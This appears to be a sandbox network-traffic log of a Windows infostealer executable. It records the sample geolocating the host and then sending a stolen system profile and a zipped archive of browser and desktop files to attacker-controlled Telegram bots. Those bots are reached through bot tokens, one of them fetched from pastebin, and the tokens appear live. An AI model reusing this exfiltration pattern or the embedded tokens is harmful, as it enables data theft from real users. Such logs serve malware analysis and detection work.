                                                            2024-08-20 09:06:29 UTC112OUTGET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                            Host: api.mylnikov.org
                                                            Connection: Keep-Alive
                                                            2024-08-20 09:06:30 UTC785INHTTP/1.1 200 OK
                                                            Date: Tue, 20 Aug 2024 09:06:30 GMT
                                                            Content-Type: application/json; charset=utf8
                                                            Content-Length: 88
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            Cache-Control: max-age=2678400
                                                            CF-Cache-Status: MISS
                                                            Last-Modified: Tue, 20 Aug 2024 09:06:30 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCXzkN%2BWdg7nvFj%2FfWW0Mk7VHxEUObRIPVoqwL0C3tcQDQ1rR1tOeom%2BHdygrqP5mt5FksoZbSgI1hYCxc2KK8MKO6%2FG%2FR4YSwDF2AYgZ3X%2Ftta58jRhqD3QWyGRmadf3aTm"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Strict-Transport-Security: max-age=0; preload
                                                            X-Content-Type-Options: nosniff
                                                            Server: cloudflare
                                                            CF-RAY: 8b613a44d87c0f7d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-08-20 09:06:30 UTC88INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 34 31 34 34 37 39 30 7d
                                                            Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1724144790}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.1049703149.154.167.2204438020C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-08-20 09:06:30 UTC1722OUTGET /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-20%205:06:19%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20506013%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201PKE1OBC%0ARAM:%204095MB%0AHWID:%205D1E7ABD56%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20 [TRUNCATED]
                                                            Host: api.telegram.org
                                                            Connection: Keep-Alive
                                                            2024-08-20 09:06:31 UTC347INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 20 Aug 2024 09:06:31 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 137
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2024-08-20 09:06:31 UTC137INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 61 6e 27 74 20 70 61 72 73 65 20 65 6e 74 69 74 69 65 73 3a 20 43 61 6e 27 74 20 66 69 6e 64 20 65 6e 64 20 6f 66 20 74 68 65 20 65 6e 74 69 74 79 20 73 74 61 72 74 69 6e 67 20 61 74 20 62 79 74 65 20 6f 66 66 73 65 74 20 39 31 37 22 7d
                                                            Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: can't parse entities: Can't find end of the entity starting at byte offset 917"}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.1049704149.154.167.2204438020C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-08-20 09:06:31 UTC171OUTGET /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                            Host: api.telegram.org
                                                            2024-08-20 09:06:32 UTC388INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 20 Aug 2024 09:06:31 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 279
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2024-08-20 09:06:32 UTC279INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 39 33 33 37 35 33 37 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 6b 6d 6f 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6e 69 6b 6f 75 6d 6f 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 72 6f 58 36 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 34 31 34 34 37 39 31 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 63 31 20 55 70 6c
                                                            Data Ascii: {"ok":true,"result":{"message_id":493,"from":{"id":7293375371,"is_bot":true,"first_name":"nikmok","username":"nikoumok_bot"},"chat":{"id":5795480469,"first_name":"ZeroX64","username":"Diamotrix","type":"private"},"date":1724144791,"text":"\ud83d\udcc1 Upl


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.1049706149.154.167.2204438020C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-08-20 09:06:32 UTC254OUTPOST /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795480469 HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary="e35d3d9c-f92c-4c5d-add6-08cfbcb74510"
                                                            Host: api.telegram.org
                                                            Content-Length: 119649
                                                            Expect: 100-continue
                                                            2024-08-20 09:06:33 UTC25INHTTP/1.1 100 Continue
                                                            2024-08-20 09:06:33 UTC40OUTData Raw: 2d 2d 65 33 35 64 33 64 39 63 2d 66 39 32 63 2d 34 63 35 64 2d 61 64 64 36 2d 30 38 63 66 62 63 62 37 34 35 31 30 0d 0a
                                                            Data Ascii: --e35d3d9c-f92c-4c5d-add6-08cfbcb74510
                                                            2024-08-20 09:06:33 UTC261OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 39 61 65 36 31 33 37 34 61 35 61 61 65 63 36 33 39 66 63 64 34 38 64 35 63 33 65 38 30 32 63 61 5c 62 72 6f 6b 40 35 30 36 30 31 33 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 62 72 6f 6b 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 39 61 65 36 31 33 37 34 61 35 61 61 65 63 36 33 39 66 63 64 34 38 64 35 63 33 65 38 30 32 63 61 25 35 43 62 72 6f 6b 25 34 30 35 30 36 30 31 33 5f 65 6e 2d 43 48 2e 7a
                                                            Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9ae61374a5aaec639fcd48d5c3e802ca%5Cuser%40506013_en-CH.z
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 b5 4d 14 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 b5 4d 14 59 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 ca 28 14 59 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 ca 28 14 59 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42
                                                            Data Ascii: PKMYBrowsers\Edge\PKMYBrowsers\Google\PK(YQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PK(YceS^B
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: c3 43 b7 b5 5b 48 61 6f 42 3f 9a 4d 0b 16 83 2c a5 aa 96 f6 0d 12 40 7f 46 ae 01 31 a0 df 83 38 73 04 7c 7f 87 f4 a4 7a a0 b6 f3 19 aa 54 a3 ea 7b 2e fd e6 25 a7 b4 89 8d d3 00 85 d2 97 3d dd 55 2e af 1c 9f 9e 68 0e df a3 cb e5 e5 f2 78 cc cc 91 cb 04 ab cc c3 c9 df e1 62 dc 88 2f 8e 81 08 d1 ec 3b 73 1e 29 61 1b 25 bc d8 5d 8f 50 c3 96 5b ca 48 2d f6 e1 eb 54 a5 55 fd a1 a2 5d 7c 3d 8c 84 5b 25 98 d4 fb 74 a0 6b 51 c4 58 ba 74 be c5 5f 62 fd 01 dc d3 6a 69 65 6d ed 13 67 37 9a 28 b1 fd 21 d0 dd e4 f9 05 eb b8 af 51 de 84 f8 bf 22 d3 a9 2a 7e cd 3d 28 8e 4b ac 5e e6 93 7c 82 9b d5 eb 30 ae be da ba 25 2e ac 5b 9f 35 14 fc 88 7c c5 ac 24 d5 93 1f 3c 06 72 21 3b 0b 60 cc fb 21 f2 b7 39 85 20 a7 3d f5 e2 8d 14 ba 9e 77 1d 5b 12 b4 7d b2 40 72 a1 04 28 df 93
                                                            Data Ascii: C[HaoB?M,@F18s|zT{.%=U.hxb/;s)a%]P[H-TU]|=[%tkQXt_bjiemg7(!Q"*~=(K^|0%.[5|$<r!;`!9 =w[}@r(
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: 30 ae be da ba 25 2e ac 5b 9f 35 14 fc 88 7c c5 ac 24 d5 93 1f 3c 06 72 21 3b 0b 60 cc fb 21 f2 b7 39 85 20 a7 3d f5 e2 8d 14 ba 9e 77 1d 5b 12 b4 7d b2 40 72 a1 04 28 df 93 9e a7 5d aa 7f 68 9d ca 7a 7d 67 c7 73 3b 79 94 cb 87 73 3d e1 8e 01 c5 7c fb ea f8 54 29 ea 23 4f 35 41 3d d1 dd 98 a4 c7 c0 f1 a8 b1 6f a6 92 df 1e 88 ce 1a d0 af 86 dd 15 8b 14 f3 20 c3 de a6 66 3e 99 c2 89 eb 5c 94 96 2d 38 de 2f 62 3f e6 33 ef da 4a f6 37 df 06 df 59 27 b9 eb d3 96 cf 34 c5 75 b7 a3 d4 3c 4f b1 ec 1f c7 6c 28 18 35 24 31 ef 62 56 c8 fb 78 d0 2b 59 27 f1 5d c8 92 cd 8b ed 14 9a 2d 34 83 a4 36 57 57 33 d5 56 66 4c 17 80 25 d4 b4 f7 85 4f cb da e8 a0 ff fe fc 01 50 4b 03 04 14 00 00 00 08 00 f8 33 45 57 2e 53 12 29 84 02 00 00 02 04 00 00 3f 00 00 00 47 72 61 62 62
                                                            Data Ascii: 0%.[5|$<r!;`!9 =w[}@r(]hz}gs;ys=|T)#O5A=o f>\-8/b?3J7Y'4u<Ol(5$1bVx+Y']-46WW3VfL%OPK3EW.S)?Grabb
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: 39 ba 7e 52 7e 97 24 f0 cb 6e d2 d3 f7 e4 99 27 ae b6 b9 aa 64 f9 ab 5d 39 c5 b1 8f cf 29 5b da 18 7b 61 44 9a ba 73 5a 65 8e 77 7f 26 a8 1f df 98 ca 5f eb 26 99 88 4e 4b 4b ae 8b d8 a5 5d 2e 53 32 be 9f 23 89 ba fe a0 5a f0 ee 82 8b 5e c2 cd 66 19 b1 cf a2 0b 93 39 b9 9d 7a 9b ae c4 e2 03 94 b5 73 ab 3d ed 92 0f 7c 14 f4 1e 5c 3f 8d 7c d7 35 09 52 71 08 69 b4 57 8a b8 fd 7b ac a6 ff c0 de 47 ee 22 84 d9 a2 d6 b0 56 97 5c a5 ab 1b 84 f2 d7 19 18 ee 0a 5b 33 f2 b3 e2 a1 a6 54 ca d1 61 5b bd b5 43 86 b4 bd 13 ae fc c7 6a ac 2a bd f4 b8 87 ed 31 e2 1e 69 36 fd 4b 8f 44 f2 94 9a c4 db 6a 7e eb 09 9c f0 05 ba ba b3 a7 e2 43 cd ed 3b 8f 5b fb 76 f1 5f d2 1f 6c 73 db cc e0 cd 36 c5 3f 8e 11 c5 ef 5d 3d 75 aa d2 2b 28 9c bf f0 8d f1 52 ac 14 d5 eb 11 7b a9 4b 6a
                                                            Data Ascii: 9~R~$n'd]9)[{aDsZew&_&NKK].S2#Z^f9zs=|\?|5RqiW{G"V\[3Ta[Cj*1i6KDj~C;[v_ls6?]=u+(R{Kj
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: dd f5 0a 53 be 55 b8 9d 8c f2 bc d9 db 92 c5 fc e3 c7 5c f2 f7 ef b0 d3 f6 36 a5 1f 9b f3 78 9d 6f 72 e8 e9 ba ba 28 a3 37 ce a7 2c 0e 71 3d a5 2d 1d 57 86 2d 38 c2 44 b2 92 e6 2e 52 25 49 4e 69 95 cd 47 e4 fa 65 d3 18 11 01 96 d4 5e 97 7a ec c1 e9 e8 27 f4 6e ed 35 04 b4 0e e2 01 9d a5 6f d6 f3 13 cb f4 2c 71 46 50 4f cf 62 ab a1 6d b6 cd 49 d7 6d 41 cb 54 c1 24 bd 1f 07 db 30 0e 03 7e d5 2f 89 9d aa ee 71 8c ec 59 44 00 6e 22 dd f6 8b d7 26 e0 b7 70 4a 78 da a5 58 81 cf ec 5f 63 00 7a 99 98 65 6b b1 2f 8d 62 0d f1 4e d7 7c be 7b 58 6c 80 9d 68 e6 24 5e da 54 bd 30 b9 88 2a 95 7a 17 33 b9 3b 3c 53 e6 de e2 6d 77 cd ed 5d ba 91 8f dc ad c4 8f 91 9f 77 ce 88 0f 34 2a 75 a1 1f f6 b7 f9 7d 6c b9 a8 82 17 c3 e0 df 0e 36 61 e0 50 7f 6e fe 43 25 b8 ee 38 f4 f8
                                                            Data Ascii: SU\6xor(7,q=-W-8D.R%INiGe^z'n5o,qFPObmImAT$0~/qYDn"&pJxX_czek/bN|{Xlh$^T0*z3;<Smw]w4*u}l6aPnC%8
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: 67 19 51 7c 1e 41 42 bd d1 58 5f 04 b1 92 1d ad 5e 68 be 8b 0e 08 e4 54 c5 c3 4a 12 0e d1 81 1f e9 34 1f 0e d0 83 31 b6 2f 9f ed 2c 27 9a dc ad b3 21 2c 5d dd 3e bc ed c6 59 70 47 47 0d 18 ae ae a2 81 f6 8d 0e 64 7e 86 3c 91 34 ed 31 61 a0 30 5d 5d 7c fe 54 49 bc 28 19 2f e6 2a 35 f5 b0 f4 b0 c3 3e 53 97 82 1a 03 bf 6e b6 91 dc 1b e0 c6 82 45 a8 c5 1a 3a 80 b8 bc 7a b5 f2 33 a1 54 35 c6 3e f8 f3 9a 04 b4 6f 01 c1 9a 63 65 8a 0e 84 b7 3d 92 94 b2 51 48 2c ff a1 46 f3 19 a0 31 69 2c e9 a3 a0 da b7 40 2e df ee f3 36 3c 32 e5 af 8d 69 a0 25 83 db 5f cf 5b 5f de 3c 95 02 f7 f3 bf 3c 6d e8 c0 75 69 c6 3b 76 b4 5a 8b 95 19 c6 a1 a4 bd e5 53 6e 96 ca a8 47 83 c1 4b 44 c4 ba 1b c9 6e 02 aa ec ff 99 b2 f3 b5 4b 27 5f f9 34 d9 70 4e 95 0e 34 7e 44 fd e6 43 e5 b7 a3
                                                            Data Ascii: gQ|ABX_^hTJ41/,'!,]>YpGGd~<41a0]]|TI(/*5>SnE:z3T5>oce=QH,F1i,@.6<2i%_[_<<mui;vZSnGKDnK'_4pN4~DC
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: 9a 55 3d f3 b3 79 7b 84 c9 b7 63 7b 5f f4 d5 15 90 04 2f 72 ce 8b fa 15 5f 1b 0b 9c 30 8f ff 95 8b 77 b2 fa f8 6e 6a b1 42 f0 56 88 f2 a0 97 84 f3 c3 94 ea 43 eb f6 28 f0 b0 84 ff 1c d6 44 60 67 cb e7 64 ce ef 27 27 07 13 07 6e 67 92 12 13 38 63 04 15 76 54 ef cc 12 78 f8 f9 7b c6 37 3d c2 f8 d0 d5 9b 09 44 c3 8b cf 9d 36 2e cd 9f 83 a7 95 cd ff da 6c f3 a7 a4 05 ed d8 52 0c ff fb 03 1a 89 17 54 ee 62 ff 0f a7 46 58 f3 ff 20 d6 05 83 63 d2 bf dc 73 8c 7c 1d 7c 2b 25 c7 f8 43 06 0d a9 f6 42 b9 7a c6 51 54 32 19 cb c7 76 2a b0 9e 69 bf 8e 08 8c 04 94 80 20 24 69 94 97 73 dc be 60 00 a3 09 c6 d0 cc 0c 06 52 3e c6 aa 50 bf c5 73 ca ce 74 b8 13 1a 0e 64 50 d9 6d 4e 2a 40 36 c4 2c 22 9c 41 99 51 fe d2 60 07 a9 2f 81 68 d7 8e 61 14 50 c1 8c d7 40 47 ae 45 87 51
                                                            Data Ascii: U=y{c{_/r_0wnjBVC(D`gd''ng8cvTx{7=D6.lRTbFX cs||+%CBzQT2v*i $is`R>PstdPmN*@6,"AQ`/haP@GEQ
                                                            2024-08-20 09:06:33 UTC4819OUTData Raw: 00 00 c8 3b 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 65 73 6b 74 6f 70 5c 50 41 4c 52 47 55 43 56 45 48 5c 45 49 56 51 53 41 4f 54 41 51 2e 70 6e 67 50 4b 01 02 14 00 14 00 00 00 08 00 f8 33 45 57 83 7c 77 bd 84 02 00 00 02 04 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 a6 3e 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 65 73 6b 74 6f 70 5c 50 41 4c 52 47 55 43 56 45 48 5c 45 4f 57 52 56 50 51 43 43 53 2e 70 64 66 50 4b 01 02 14 00 14 00 00 00 08 00 f8 33 45 57 2e 53 12 29 84 02 00 00 02 04 00 00 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 84 41 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 65 73 6b 74 6f 70 5c 50 41
                                                            Data Ascii: ;Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\EIVQSAOTAQ.pngPK3EW|w<>Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\EOWRVPQCCS.pdfPK3EW.S)=AGrabber\DRIVE-C\Users\user\Desktop\PA
                                                            2024-08-20 09:06:33 UTC884INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 20 Aug 2024 09:06:33 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 496
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            {"ok":true,"result":{"message_id":494,"from":{"id":7293375371,"is_bot":true,"first_name":"nikmok","username":"nikoumok_bot"},"chat":{"id":5795480469,"first_name":"ZeroX64","username":"Diamotrix","type":"private"},"date":1724144793,"document":{"file_name":"C_UsersuserAppDataLocal9ae61374a5aaec639fcd48d5c3e802causer@5060.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIB7mbEXJmFAiLNV3MS0i2ENTaktGHKAAJjEgACPN0pUvYVr8xCCXpjNQQ","file_unique_id":"AgADYxIAAjzdKVI","file_size":119304}}}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.1049709172.67.19.244438020C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-08-20 09:06:34 UTC74OUTGET /raw/7B75u64B HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-08-20 09:06:34 UTC391INHTTP/1.1 200 OK
                                                            Date: Tue, 20 Aug 2024 09:06:34 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: EXPIRED
                                                            Last-Modified: Tue, 20 Aug 2024 09:06:34 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8b613a63c9137ca8-EWR
                                                            2024-08-20 09:06:34 UTC52INData Raw: 32 65 0d 0a 35 33 39 30 37 35 37 37 38 38 3a 41 41 46 56 36 35 59 64 75 6e 39 4f 50 34 30 67 37 38 58 78 49 35 65 44 62 56 34 32 4b 71 48 59 35 6d 55 0d 0a
                                                            Data Ascii: 2e5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU
                                                            2024-08-20 09:06:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.1049711149.154.167.2204438020C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-08-20 09:06:35 UTC254OUTPOST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary="e245ce92-0133-448a-9d84-72d663372986"
                                                            Host: api.telegram.org
                                                            Content-Length: 119649
                                                            Expect: 100-continue
                                                            2024-08-20 09:06:35 UTC40OUTData Raw: 2d 2d 65 32 34 35 63 65 39 32 2d 30 31 33 33 2d 34 34 38 61 2d 39 64 38 34 2d 37 32 64 36 36 33 33 37 32 39 38 36 0d 0a
                                                            Data Ascii: --e245ce92-0133-448a-9d84-72d663372986
                                                            2024-08-20 09:06:35 UTC261OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 39 61 65 36 31 33 37 34 61 35 61 61 65 63 36 33 39 66 63 64 34 38 64 35 63 33 65 38 30 32 63 61 5c 62 72 6f 6b 40 35 30 36 30 31 33 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 62 72 6f 6b 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 39 61 65 36 31 33 37 34 61 35 61 61 65 63 36 33 39 66 63 64 34 38 64 35 63 33 65 38 30 32 63 61 25 35 43 62 72 6f 6b 25 34 30 35 30 36 30 31 33 5f 65 6e 2d 43 48 2e 7a
                                                            Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9ae61374a5aaec639fcd48d5c3e802ca%5Cuser%40506013_en-CH.z
                                                            2024-08-20 09:06:35 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 b5 4d 14 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 b5 4d 14 59 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 ca 28 14 59 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 ca 28 14 59 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42
                                                            Data Ascii: PKMYBrowsers\Edge\PKMYBrowsers\Google\PK(YQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PK(YceS^B
                                                            2024-08-20 09:06:35 UTC16355OUTData Raw: c3 43 b7 b5 5b 48 61 6f 42 3f 9a 4d 0b 16 83 2c a5 aa 96 f6 0d 12 40 7f 46 ae 01 31 a0 df 83 38 73 04 7c 7f 87 f4 a4 7a a0 b6 f3 19 aa 54 a3 ea 7b 2e fd e6 25 a7 b4 89 8d d3 00 85 d2 97 3d dd 55 2e af 1c 9f 9e 68 0e df a3 cb e5 e5 f2 78 cc cc 91 cb 04 ab cc c3 c9 df e1 62 dc 88 2f 8e 81 08 d1 ec 3b 73 1e 29 61 1b 25 bc d8 5d 8f 50 c3 96 5b ca 48 2d f6 e1 eb 54 a5 55 fd a1 a2 5d 7c 3d 8c 84 5b 25 98 d4 fb 74 a0 6b 51 c4 58 ba 74 be c5 5f 62 fd 01 dc d3 6a 69 65 6d ed 13 67 37 9a 28 b1 fd 21 d0 dd e4 f9 05 eb b8 af 51 de 84 f8 bf 22 d3 a9 2a 7e cd 3d 28 8e 4b ac 5e e6 93 7c 82 9b d5 eb 30 ae be da ba 25 2e ac 5b 9f 35 14 fc 88 7c c5 ac 24 d5 93 1f 3c 06 72 21 3b 0b 60 cc fb 21 f2 b7 39 85 20 a7 3d f5 e2 8d 14 ba 9e 77 1d 5b 12 b4 7d b2 40 72 a1 04 28 df 93
                                                            Data Ascii: C[HaoB?M,@F18s|zT{.%=U.hxb/;s)a%]P[H-TU]|=[%tkQXt_bjiemg7(!Q"*~=(K^|0%.[5|$<r!;`!9 =w[}@r(
